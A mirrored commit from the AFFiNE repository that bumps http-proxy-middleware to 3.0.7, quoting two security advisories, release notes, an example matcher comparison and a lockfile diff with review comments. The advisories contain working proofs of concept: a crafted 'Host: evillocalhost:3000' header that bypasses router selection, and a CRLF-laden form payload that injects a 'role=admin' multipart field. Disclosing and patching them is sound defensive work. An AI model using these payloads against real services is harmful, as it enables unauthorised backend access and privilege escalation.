mirror of
https://github.com/toeverything/AFFiNE.git
synced 2026-07-01 17:50:50 +08:00
chore: bump up http-proxy-middleware version to v3.0.7 [SECURITY] (#15131)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [http-proxy-middleware](https://redirect.github.com/chimurai/http-proxy-middleware) | [`3.0.5` → `3.0.7`](https://renovatebot.com/diffs/npm/http-proxy-middleware/3.0.5/3.0.7) |  |  |

---

### http-proxy-middleware `router` host+path substring matching allows Host-header-driven backend routing bypass

[CVE-2026-55602](https://nvd.nist.gov/vuln/detail/CVE-2026-55602) / [GHSA-64mm-vxmg-q3vj](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj)

<details>
<summary>More information</summary>

#### Details

##### Summary

`http-proxy-middleware` documents `router` proxy-table entries as host, path, or host+path selectors, but the host+path implementation uses unanchored substring matching on attacker-controlled request metadata. As a result, a crafted `Host` header that is only a superstring match for a configured host+path key can still route a request to an unintended backend.

##### Details

Tested code state:

- validated on tag `v4.0.0-beta.5`
- corresponding commit: `339f09ede860197807d4fd99ed9020fa5d0bd358`

Relevant code locations:

- `src/router.ts`
- `src/http-proxy-middleware.ts`

Affected public API:

- `createProxyMiddleware({ router: { 'host/path': 'http://target' } })`

Code explanation:

When a proxy-table router key contains `/`, `getTargetFromProxyTable()` concatenates attacker-controlled `req.headers.host` and `req.url` into a single `hostAndPath` string, then accepts the route if:

```ts
hostAndPath.indexOf(key) > -1
```

That is a substring test, not an exact host match plus intended path match.

In the validated PoC, the configured router key is:

```txt
localhost:3000/api
```

but the attacker-controlled host is:

```txt
evillocalhost:3000
```

and the request path is:

```txt
/api
```

The concatenated attacker-controlled string:

```txt
evillocalhost:3000/api
```

still contains the configured router key as a substring, so the middleware selects the alternate backend even though the host is not equal to the configured host.

Exploit path:

1. the application enables the documented proxy-table `router` feature with at least one host+path rule
2. an external attacker sends an ordinary HTTP request with a crafted `Host` header
3. `HttpProxyMiddleware.prepareProxyRequest()` applies router selection before proxying
4. `getTargetFromProxyTable()` accepts the crafted `Host + path` string through substring matching
5. the request is proxied to the wrong backend

##### PoC

Create these files in the same working directory and run:

```bash
bash ./run.sh
```

##### File: `run.sh`

```bash
#!/usr/bin/env bash
set -euo pipefail

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
REPO_URL="https://github.com/chimurai/http-proxy-middleware.git"
REPO_REF="v4.0.0-beta.5"
WORKDIR="$(mktemp -d "${SCRIPT_DIR}/.tmp-repro.XXXXXX")"
TARGET_REPO_DIR="${WORKDIR}/repo"
REPRO_DIR="${WORKDIR}/reproduction"
IMAGE_TAG="http-proxy-middleware-router-bypass-poc"

cleanup() {
  rm -rf "${WORKDIR}"
}
trap cleanup EXIT

echo "[a3] cloning target repository"
git clone --quiet "${REPO_URL}" "${TARGET_REPO_DIR}"
git -C "${TARGET_REPO_DIR}" checkout --quiet "${REPO_REF}"

mkdir -p "${REPRO_DIR}"
cp "${SCRIPT_DIR}/Dockerfile" "${WORKDIR}/Dockerfile"
cp "${SCRIPT_DIR}/verify.mjs" "${REPRO_DIR}/verify.mjs"

echo "[a3] building reproduction image"
docker build -f "${WORKDIR}/Dockerfile" -t "${IMAGE_TAG}" "${WORKDIR}"

echo "[a3] running verification"
docker run --rm "${IMAGE_TAG}" node /work/reproduction/verify.mjs
```

##### File: `Dockerfile`

```Dockerfile
FROM node:22-bullseye

WORKDIR /work

COPY repo/package.json repo/yarn.lock /work/repo/
RUN corepack enable \
  && cd /work/repo \
  && yarn install --frozen-lockfile

COPY repo /work/repo
RUN cd /work/repo && yarn build

COPY reproduction /work/reproduction
```

##### File: `verify.mjs`

```js
import http from 'node:http';
import fs from 'node:fs';
import assert from 'node:assert/strict';
import { createProxyMiddleware } from '/work/repo/dist/index.js';

const ROUTER_KEY = 'localhost:3000/api';
const CRAFTED_HOST = 'evillocalhost:3000';

function listen(server, port) {
  return new Promise((resolve) => {
    server.listen(port, '127.0.0.1', () => resolve());
  });
}

function close(server) {
  return new Promise((resolve, reject) => {
    server.close((err) => {
      if (err) {
        reject(err);
        return;
      }
      resolve();
    });
  });
}

function request(path, host) {
  return new Promise((resolve, reject) => {
    const req = http.request(
      {
        host: '127.0.0.1',
        port: 3000,
        path,
        method: 'GET',
        headers: {
          Host: host,
        },
      },
      (res) => {
        let data = '';
        res.setEncoding('utf8');
        res.on('data', (chunk) => {
          data += chunk;
        });
        res.on('end', () => {
          resolve({ statusCode: res.statusCode, body: data });
        });
      },
    );
    req.on('error', reject);
    req.end();
  });
}

const defaultBackend = http.createServer((req, res) => {
  res.end('DEFAULT');
});

const secretBackend = http.createServer((req, res) => {
  res.end('SECRET');
});

const proxyMiddleware = createProxyMiddleware({
  target: 'http://127.0.0.1:3101',
  router: {
    [ROUTER_KEY]: 'http://127.0.0.1:3102',
  },
});

const proxyServer = http.createServer((req, res) => {
  proxyMiddleware(req, res, () => {
    res.statusCode = 404;
    res.end('NO_PROXY');
  });
});

try {
  assert.ok(fs.existsSync('/work/repo/dist/index.js'));
  assert.ok(fs.existsSync('/work/reproduction/verify.mjs'));

  await listen(defaultBackend, 3101);
  await listen(secretBackend, 3102);
  await listen(proxyServer, 3000);
  console.log('STEP start-services ok');

  const baseline = await request('/api', 'safe.example:3000');
  assert.equal(baseline.statusCode, 200);
  assert.equal(baseline.body, 'DEFAULT');
  console.log(`STEP baseline-route body=${baseline.body}`);

  const crafted = await request('/api', CRAFTED_HOST);
  assert.equal(crafted.statusCode, 200);
  assert.equal(crafted.body, 'SECRET');
  assert.notEqual(CRAFTED_HOST, ROUTER_KEY.split('/')[0]);
  console.log(`STEP crafted-route body=${crafted.body}`);

  console.log('RESULT reproduced host_header_injection router substring match bypass');
} finally {
  await Promise.allSettled([close(proxyServer), close(defaultBackend), close(secretBackend)]);
}
```

This PoC starts:

- one default backend returning `DEFAULT`
- one alternate backend returning `SECRET`
- one proxy using:

```js
createProxyMiddleware({
  target: 'http://127.0.0.1:3101',
  router: {
    [ROUTER_KEY]: 'http://127.0.0.1:3102',
  },
});
```

It then sends:

1. a baseline request to `/api` with `Host: safe.example:3000`
2. a crafted request to `/api` with `Host: evillocalhost:3000`

Observed result from the validated PoC:

- baseline request: `STEP baseline-route body=DEFAULT`
- crafted request: `STEP crafted-route body=SECRET`
- success marker: `RESULT reproduced host_header_injection router substring match bypass`

The PoC is considered successful only if:

1. the baseline request stays on the default backend
2. the crafted request reaches the alternate backend
3. the crafted host is not equal to the configured router host

##### Impact

This is a backend-selection integrity issue in a documented library feature. Applications that use host+path router-table rules for backend segmentation, tenant routing, or separation of public and more sensitive upstreams can have that routing boundary bypassed by an unauthenticated external client using an ordinary crafted `Host` header.

#### Severity

- CVSS Score: 6.9 / 10 (Medium)
- Vector String: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N`

#### References

- [https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj](https://redirect.github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj)
- [https://github.com/advisories/GHSA-64mm-vxmg-q3vj](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj)

This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).

</details>

---

### http-proxy-middleware: multipart/form-data field injection via unescaped CRLF in `fixRequestBody`

[CVE-2026-55603](https://nvd.nist.gov/vuln/detail/CVE-2026-55603) / [GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm)

<details>
<summary>More information</summary>

#### Details

##### Summary

`fixRequestBody()` is the library's documented helper for re-emitting a request body that was already consumed by a body parser. When the **outgoing** `Content-Type` is `multipart/form-data`, it rebuilds the body with `handlerFormDataBodyData()`, which interpolates each `req.body` key and value directly into the multipart wire format **without neutralizing CR/LF**:

```js
// dist/handlers/fix-request-body.js
function handlerFormDataBodyData(contentType, data) {
  const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1');
  let str = '';
  for (const [key, value] of Object.entries(data)) {
    // key and value are interpolated as-is: no CR/LF or quote handling
    str += `--${boundary}\r\nContent-Disposition: form-data; name="${key}"\r\n\r\n${value}\r\n`;
  }
  return str;
}
```

A `\r\n` inside a value (or key) lets an attacker close the current part and inject an **entirely new form part**.
Because the proxy's own body parser saw a single opaque value, any gateway-side policy or validation performed on `req.body` is evaluated against a different set of fields than the upstream backend ultimately parses: a request/parameter desynchronization across the trust boundary.

By contrast, the sibling output branches are safe: `application/json` uses `JSON.stringify` (escapes control chars) and `application/x-www-form-urlencoded` uses `querystring.stringify` (percent-encodes). Only the multipart branch lacks escaping.

##### Preconditions

All three must hold; this narrows real-world exposure and is the basis for `AC:H`:

1. The proxy app populates `req.body` with a **non-multipart** parser (`express.urlencoded`, `express.json`, or text) so an injected boundary in a value is **not** split on input.
2. The proxied (outgoing) request is sent as **`multipart/form-data`** (e.g. an adaptation layer, or any flow that sets the upstream content-type to multipart), so the vulnerable branch runs.
3. The app calls `fixRequestBody` (the documented pattern for "I body-parsed, now re-stream"), and an attacker controls at least one body field value or key.

> Note: a pure multipart-in → multipart-out flow (e.g. `multer`) is generally **not** exploitable for a *new-field* injection, because the proxy's multipart parser already splits the injected boundary, so `req.body` and the backend agree. The desync specifically requires a non-multipart input parser.

##### Impact

When the preconditions hold, an attacker injects/overrides multipart fields seen only by the backend:

- **Validation / access-control bypass**: bypass gateway-side field checks (demonstrated below: a gateway that forbids `role=admin` is bypassed; backend grants admin).
- **Parameter tampering**: add or overwrite fields the backend trusts (IDs, flags, prices).
- **File-part injection**: inject a `filename="..."` part into the upstream multipart stream.

##### Proof of Concept

```js
// npm i http-proxy-middleware@4.0.0 (Node ESM: save as minimal.mjs)
import { fixRequestBody } from 'http-proxy-middleware';

// `req.body` as a NON-multipart parser (express.urlencoded / express.json) yields it.
// The attacker sent user=alice%0D%0A--BB%0D%0A... so this ONE field's value holds CRLF:
const req = { readableLength: 0, body: {
  user: 'alice\r\n--BB\r\nContent-Disposition: form-data; name="role"\r\n\r\nadmin\r\n--BB--'
}};

// Minimal stand-in for the outgoing proxy request; capture what gets written.
const out = [];
const proxyReq = {
  h: { 'content-type': 'multipart/form-data; boundary=BB' },
  getHeader(n){ return this.h[n.toLowerCase()]; },
  setHeader(n,v){ this.h[n.toLowerCase()] = v; },
  write(d){ out.push(Buffer.from(d)); },
};

fixRequestBody(proxyReq, req); // library rebuilds the multipart body
console.log(Buffer.concat(out).toString());
```

Output: one input field becomes **two** parts; `role=admin` was injected via the unescaped CRLF:

```
--BB
Content-Disposition: form-data; name="user"

alice
--BB
Content-Disposition: form-data; name="role"   <-- injected part; never present in req.body's keys

admin
--BB--
```

`req.body` had a single key (`user`), so any gateway policy checking `req.body.role` passes, yet the backend's multipart parser receives `role=admin`.

On the wire the attacker simply sends, as `application/x-www-form-urlencoded`: `user=alice%0D%0A--BB%0D%0AContent-Disposition:%20form-data;%20name="role"%0D%0A%0D%0Aadmin%0D%0A--BB--`

##### Remediation

Neutralize CR/LF (and `"`) in keys/values before interpolation, or build the body with a real multipart encoder (e.g. `FormData` / `form-data`) instead of string concatenation.

Minimal fix:

```js
function handlerFormDataBodyData(contentType, data) {
  const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1');
  const bad = /[\r\n]/;
  let str = '';
  for (const [key, value] of Object.entries(data)) {
    const v = String(value);
    // Reject rather than strip, so malicious input is not masked
    if (bad.test(key) || bad.test(v)) {
      throw new Error('fixRequestBody: CR/LF not allowed in multipart field name/value');
    }
    str += `--${boundary}\r\nContent-Disposition: form-data; name="${key.replace(/"/g, '%22')}"\r\n\r\n${v}\r\n`;
  }
  return str;
}
```

(Reject is preferable to silent stripping, to avoid masking malicious input.)

#### Severity

- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N`

#### References

- [https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm)
- [https://github.com/advisories/GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm)

This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).

</details>

---

### Release Notes

<details>
<summary>chimurai/http-proxy-middleware (http-proxy-middleware)</summary>

### [`v3.0.7`](https://redirect.github.com/chimurai/http-proxy-middleware/releases/tag/v3.0.7)

[Compare Source](https://redirect.github.com/chimurai/http-proxy-middleware/compare/v3.0.6...v3.0.7)

#### What's Changed

- fix(fixRequestBody): harden form-data stringification by [@chimurai](https://redirect.github.com/chimurai) in [#1259](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1259)
- chore(package.json): v3.0.7 by [@chimurai](https://redirect.github.com/chimurai) in [#1261](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1261)

**Full Changelog**: <https://github.com/chimurai/http-proxy-middleware/compare/v3.0.6...v3.0.7>

### [`v3.0.6`](https://redirect.github.com/chimurai/http-proxy-middleware/releases/tag/v3.0.6)

[Compare Source](https://redirect.github.com/chimurai/http-proxy-middleware/compare/v3.0.5...v3.0.6)

#### What's Changed

- fix(types): fix Logger type by [@chimurai](https://redirect.github.com/chimurai) in [#1104](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1104)
- fix(fixRequestBody): support text/plain by [@knudtty](https://redirect.github.com/knudtty) in [#1103](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1103)
- chore(examples): bump deps by [@chimurai](https://redirect.github.com/chimurai) in [#1105](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1105)
- build(prettier): improve prettier setup by [@chimurai](https://redirect.github.com/chimurai) in [#1108](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1108)
- chore(deps): fix punycode node deprecation warning by [@chimurai](https://redirect.github.com/chimurai) in [#1109](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1109)
- chore(examples): bump deps by [@chimurai](https://redirect.github.com/chimurai) in [#1110](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1110)
- build(codespaces): add devcontainer.json by [@chimurai](https://redirect.github.com/chimurai) in [#1112](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1112)
- chore(package): bump dev dependencies by [@chimurai](https://redirect.github.com/chimurai) in [#1116](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1116)
- ci(github-action): ci.yml add node v24 by [@chimurai](https://redirect.github.com/chimurai) in [#1117](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1117)
- chore(package): bump dev dependencies by [@chimurai](https://redirect.github.com/chimurai) in [#1118](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1118)
- chore(package): upgrade to jest v30 by [@chimurai](https://redirect.github.com/chimurai) in [#1122](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1122)
- chore(examples): upgrade deps by [@chimurai](https://redirect.github.com/chimurai) in [#1124](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1124)
- chore(package): update dev deps by [@chimurai](https://redirect.github.com/chimurai) in [#1125](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1125)
- test(websocket): fix ws import by [@chimurai](https://redirect.github.com/chimurai) in [#1126](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1126)
- chore(refactor): use `node:` protocol imports by [@chimurai](https://redirect.github.com/chimurai) in [#1127](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1127)
- ci(node24): pin node24 due to TLS issue with mockttp by [@chimurai](https://redirect.github.com/chimurai) in [#1137](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1137)
- docs(recipes/pathRewrite.md): fix comment by [@DEBargha2004](https://redirect.github.com/DEBargha2004) in [#1135](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1135)
- chore(package): bump dev deps by [@chimurai](https://redirect.github.com/chimurai) in [#1138](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1138)
- chore(deps): update actions/checkout action to v5 by [@chimurai](https://redirect.github.com/chimurai) in [#1140](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1140)
- fix(error-response-plugin): sanitize input by [@chimurai](https://redirect.github.com/chimurai) in [#1141](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1141)
- chore(package.json): update dev deps by [@chimurai](https://redirect.github.com/chimurai) in [#1143](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1143)
- chore: add context7.json by [@chimurai](https://redirect.github.com/chimurai) in [#1144](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1144)
- build(eslint): update eslint.config.mjs by [@chimurai](https://redirect.github.com/chimurai) in [#1145](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1145)
- ci(github workflow): harden github workflows by [@chimurai](https://redirect.github.com/chimurai) in [#1146](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1146)
- chore(package): bump dev deps by [@chimurai](https://redirect.github.com/chimurai) in [#1147](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1147)
- ci(ci.yml): unpin node 24 by [@chimurai](https://redirect.github.com/chimurai) in [#1148](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1148)
- docs(recipes): fix servers.md http.createServer example by [@hacklschorsch](https://redirect.github.com/hacklschorsch) in [#1150](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1150)
- ci: publish with oidc by [@chimurai](https://redirect.github.com/chimurai) in [#1152](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1152)
- chore(package.json): bump dev deps by [@chimurai](https://redirect.github.com/chimurai) in [#1153](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1153)
- chore(package.json): bump dev deps by [@chimurai](https://redirect.github.com/chimurai) in [#1155](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1155)
- chore(package.json): bump dev deps by [@chimurai](https://redirect.github.com/chimurai) in [#1158](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1158)
- test(types.spec.ts): add type check when req or res are 'any' by [@chimurai](https://redirect.github.com/chimurai) in [#1161](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1161)
- chore(package.json): bump deps by [@chimurai](https://redirect.github.com/chimurai) in [#1164](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1164)
- chore(package.json): eslint v10 by [@chimurai](https://redirect.github.com/chimurai) in [#1165](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1165)
- chore(package.json): bump dev deps by [@chimurai](https://redirect.github.com/chimurai) in [#1166](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1166)
- chore(package.json): bump dev-deps by [@chimurai](https://redirect.github.com/chimurai) in [#1171](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1171)
- docs(examples): fix websocket example by [@chimurai](https://redirect.github.com/chimurai) in [#1170](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1170)
- build(vscode): use workspace version of TypeScript by [@chimurai](https://redirect.github.com/chimurai) in [#1173](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1173)
- fix(router): harden proxy-table matching by [@chimurai](https://redirect.github.com/chimurai) in [#1254](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1254)
- chore(package.json): v3.0.6 by [@chimurai](https://redirect.github.com/chimurai) in [#1256](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1256)

#### New Contributors

- [@knudtty](https://redirect.github.com/knudtty) made their first contribution in [#1103](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1103)
- [@DEBargha2004](https://redirect.github.com/DEBargha2004) made their first contribution in [#1135](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1135)
- [@hacklschorsch](https://redirect.github.com/hacklschorsch) made their first contribution in [#1150](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1150)

**Full Changelog**: <https://github.com/chimurai/http-proxy-middleware/compare/v3.0.5...v3.0.6>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update again.

---

- [ ] If you want to rebase/retry this PR, check this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
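
The `router` advisory in the commit message above turns on a single substring test. As an added example (not http-proxy-middleware's code, and not the change made in PR #1254), the sketch below runs that test beside a hypothetical `matchAnchored` that compares the host for equality and the path on a segment boundary; the request list is constructed, and the table reuses the PoC's router key and target.

```javascript
// Added example: not http-proxy-middleware's code and not the change from PR #1254.
// TABLE reuses the router key and target from the PoC in the commit message.
const TABLE = { 'localhost:3000/api': 'http://127.0.0.1:3102' };

// The test quoted in the advisory: concatenate Host and URL, then substring-match.
function matchSubstring(table, host, url) {
  const hostAndPath = String(host) + String(url);
  for (const [key, target] of Object.entries(table)) {
    if (key.includes('/') && hostAndPath.indexOf(key) > -1) return target;
  }
  return undefined;
}

// Hypothetical stricter matcher (an assumption, not the library's API): split the
// key once, compare the host for equality, and match the path on a segment boundary.
function matchAnchored(table, host, url) {
  const reqHost = String(host || '').toLowerCase();
  const reqPath = String(url || '/').split('?')[0]; // ignore the query string
  for (const [key, target] of Object.entries(table)) {
    const slash = key.indexOf('/');
    if (slash === -1) continue; // host-only keys are out of scope here
    const keyHost = key.slice(0, slash).toLowerCase();
    const keyPath = key.slice(slash).replace(/\/+$/, ''); // drop trailing slashes
    const hostOk = keyHost === '' || keyHost === reqHost; // '' means a path-only key
    const pathOk = reqPath === keyPath || reqPath.startsWith(keyPath + '/');
    if (hostOk && pathOk) return target;
  }
  return undefined;
}

// Constructed requests: the PoC's baseline and crafted Host values, a legitimate
// request with different host casing and a sub-path, and a path-boundary check.
const CASES = [
  ['localhost:3000', '/api'],
  ['LOCALHOST:3000', '/api/users?id=1'],
  ['safe.example:3000', '/api'],
  ['evillocalhost:3000', '/api'],
  ['localhost:3000', '/apiv2'],
];

// Returns one row per request with the backend each matcher would select.
function compare(table, cases) {
  return cases.map(([host, url]) => ({
    host,
    url,
    substring: matchSubstring(table, host, url) || 'default',
    anchored: matchAnchored(table, host, url) || 'default',
  }));
}

console.table(compare(TABLE, CASES));
```

Only the anchored column keeps `evillocalhost:3000` on the default backend while still routing the configured host, which is the property a regression test for the upgraded dependency should pin down.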
@@ -25371,8 +25371,8 @@ __metadata:
linkType: hard
"http-proxy-middleware@npm:^3.0.5":
version: 3.0.5
resolution: "http-proxy-middleware@npm:3.0.5"
version: 3.0.7
resolution: "http-proxy-middleware@npm:3.0.7"
dependencies:
"@types/http-proxy": "npm:^1.17.15"
debug: "npm:^4.3.6"
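Review bot: the descriptor key `"http-proxy-middleware@npm:^3.0.5"` at the top of this hunk is unchanged while only `version` and `resolution` move to 3.0.7, so the declared range still admits 3.0.5 and 3.0.6 wherever this lockfile is not honoured. Raise the range in the owning package.json to `^3.0.7` so the floor itself excludes the releases that predate the router and fixRequestBody hardening listed in the release notes, and let the lockfile key follow from that.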
@@ -25380,7 +25380,7 @@ __metadata:
is-glob: "npm:^4.0.3"
is-plain-object: "npm:^5.0.0"
micromatch: "npm:^4.0.8"
checksum: 10/83c1956be6451a5f4a2f3c7b3d84085dbd47e1efb5bb684c1ed668a6606c18c7c07be823b0dbba1326955b64cf88de2672492940b0b48d140215fbdb06105c9a
checksum: 10/a44135de721e55517b0fca596855e1e4da92b5fdad247425b4253a345fface37b2a800fcfe37dc28863e9021d8c56cf9cb33ebd20d63c9eca6918a46b39082d4
languageName: node
linkType: hard
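Review bot: the `checksum` swap in this hunk is the only integrity evidence for the 3.0.7 archive, and nothing visible shows it was produced by the package manager rather than edited by hand. Have CI run `yarn install --immutable --check-cache` against this lockfile so a mismatch between the recorded checksum and the fetched archive fails the build. The dependency entries shown as context (`is-glob`, `is-plain-object`, `micromatch`) are unchanged, so no new transitive packages need review for this bump.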